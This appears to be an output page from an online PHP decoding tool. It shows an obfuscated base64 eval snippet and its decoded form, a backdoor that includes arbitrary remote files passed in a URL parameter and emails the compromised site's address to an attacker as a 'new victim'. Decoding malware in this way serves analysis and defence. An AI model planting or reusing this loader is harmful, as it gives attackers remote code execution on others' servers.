Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /**/eval(base64_decode('aWYgKHRyaW0oJF9HRVRbJ3gnXSkhPSdpbmJveDIwOTAwQHlhaG9vLmZyJyl7..

Decoded Output download

if (trim($_GET['x'])!='[email protected]'){@include($_GET['x']);exit();}$email = '[email protected]';$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y .'

 You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>
');

Did this file decode correctly?

Original Code

<?php /**/eval(base64_decode('aWYgKHRyaW0oJF9HRVRbJ3gnXSkhPSdpbmJveDIwOTAwQHlhaG9vLmZyJyl7QGluY2x1ZGUoJF9HRVRbJ3gnXSk7ZXhpdCgpO30kZW1haWwgPSAnaW5ib3gyMDkwMEB5YWhvby5mcic7JHkgPSAnaHR0cDovLycgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXTtAbWFpbCgkZW1haWwsICdFeHBsb2l0OiAnLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSwgJ0hleSAsIHRoaXMgaXMgYSBuZXcgdmljdGltXCdzIGV4cGxvaXQ6ICcuICR5IC4nXG5cbiBZb3UgY2FuIHVzZSAoeD1zaGVsbF91cmwpIGF0IHRoZSBlbmQgb2YgdGhlIGxpbmsgOykgJywgJ0Zyb206ICcuICRlbWFpbCAuJyA8Jy4gJGVtYWlsIC4nPlxyXG4nKTs=')); ?> 

Function Calls

base64_decode 1

Variables

None

Stats

MD5 5fb7dcb75e319aaae2f6688afb8efe2f
Eval Count 1
Decode Time 93 ms